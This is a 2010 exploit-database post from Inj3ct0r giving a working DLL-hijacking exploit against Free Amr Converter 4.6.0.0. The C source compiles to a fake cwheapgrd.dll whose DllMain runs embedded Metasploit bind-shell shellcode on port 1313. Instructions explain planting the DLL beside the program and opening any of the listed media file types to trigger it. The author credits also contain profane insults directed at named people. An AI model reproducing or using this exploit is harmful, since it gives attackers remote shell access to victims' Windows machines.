[local exploits] - Free Amr Converter 4.6.0.0 DLL Hijacking
Posted on 23 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Free Amr Converter 4.6.0.0 DLL Hijacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Free Amr Converter 4.6.0.0 DLL Hijacking Exploit by anT!-Tr0J4n in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================ Free Amr Converter 4.6.0.0 DLL Hijacking Exploit ================================================ || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################### 1 0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* #Free Amr Converter 4.6.0.0 DLL Hijacking Exploit (cwheapgrd.dll) #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Product Version : 4.6.0.0 #Vendor : http://www.ahdsoft.com/ #Tested on: Windows XP sp3 ------------------------------- Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck you kids ------------------------------- [>>] Compile code as cwheapgrd.dll [>>] Move DLL file to the directory where Free Amr Converter is installed [>>] check the result --> 0wn33d [+] exploit.acc [+] exploit.aif [+] exploit.aiff [+] exploit.ape [+] exploit.flac [+] exploit.m4a [+] exploit.m4b [+] exploit.mp3 [+] exploit.mpc [+] exploit.ogg [+] exploit.wav [+] exploit.mp4 [+] exploit.vob [+] exploit.mod [+] exploit.mpg [+] exploit.mpeg ========================== */ #include <windows.h> #define DllExport __declspec (dllexport) /* * windows/shell_bind_tcp - 476 bytes * http://www.metasploit.com * Encoder: x86/shikata_ga_nai * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=, * AutoRunScript= */ unsigned char buf[] = "x33xc9xb1x71xd9xccxd9x74x24xf4x5axb8x8bxf0x6b" "x88x31x42x14x03x42x14x83xeax77x12x9ex51x4bx0a" "x15x46xa7x13x2exc4x17x2dx90xfax5ex1cx44xccx17" "x46x1axc1x2bx7bx6bx0bxc9xcbx79xf3x02x70xa7x1c" "x1ax18x5exeax0ex4cx26x6dx61x78x82x18x2ex5cxb0" "x47x78xb2xc4x13xa2x2bxfax10xe4x75x67xb5x3cx0f" "xd8xbcxefxaexddxf7x7cx02x82xd9x94x69xf6x52x08" "xc3xddx4dx9fx38x1fx4cx58x59x99x20xcex33x2bxe6" "x9ex58x2ax15x3axe7xacx30x0fxd9x19xf0xbcx96xe1" "xc5xdcxfcxe7x42x6ex35x16x4axf8x16x82x92x75xcd" "x72xb0x29x9exe4xadxa0x37x18x21xf9x5ax28xcaxc7" "x9exa3x1dxd5xe7xbexcexb6x58x9ax29xdcx1axbax13" "x72x13x09x87x4cx1cxf4x9ax33x30x57x38x59x4fx63" "x4ax8fxdfx2bxc7x3bx4ax2dx22x97x08x8dxf0x36x57" "x04x14x71x65x45x49xf3x0cx20xaex9dxefxc1xecxe7" "xcbx29x4fx12x65x23x10xb5xbcx8dxa0xafxc8x72x85" "x6cx72x2exe8x22x8fx3bx16x40x86x68x80x7dxafxf4" "xd1xcdxf6x7exd5x29x45xdbx05x92x29xc8xe2xb4x13" "xfbxebx3bx9ex9cxfex62xacx9dxa1x5cx9bx40x3fx12" "xc6x92xf6x5cx16xdbx64x62xcdx20x58x5fx69x71x80" "x11xa4xdex36xf3x73x53x86x07xbax93x68x03x99xaf" "xf7xd5x91x1fxcbxc3x0ex66x94xdcx5ax69x57xe3x76" "x21x98x42x03x51x0ex59x36x6fx8dxcax74xfax6ex45" "x1dx97x67x4bx6fxc2xa6xebxe2x6dxc0x1axe7xaex0b" "x40xc5xbex68x96xbbx8exe3x0fx6exb4x4ex25x14xe0" "xd0xa4x5ex63xeaxb6xecx72x47xbbxf2x2dx24xcexa1" "x5dx4fx3bx15xf7x43x09x8dx49x29xa6x4exf2x38xcc" "x9cx3fx40x37x0dx9dxe6x85x77xb4x01xf8x66x3fx0a" "x04x88x79x50xebx51xa7xf6x13x98x88xe5x92x8bx5d" "xc4x69x69xdbx3ax19x03xf8xf5xdex75x17x75x1dxd3" "x80x55xd3x72xcbxd5x04x7cx2dxbdxddx09xeex44x57" "x5ax72x31xacxfbx9bxf9x5fx59xb0xfd"; BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { int (*func)(); func = (int (*)()) buf; (int)(*func)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-23]</pre></body></html>
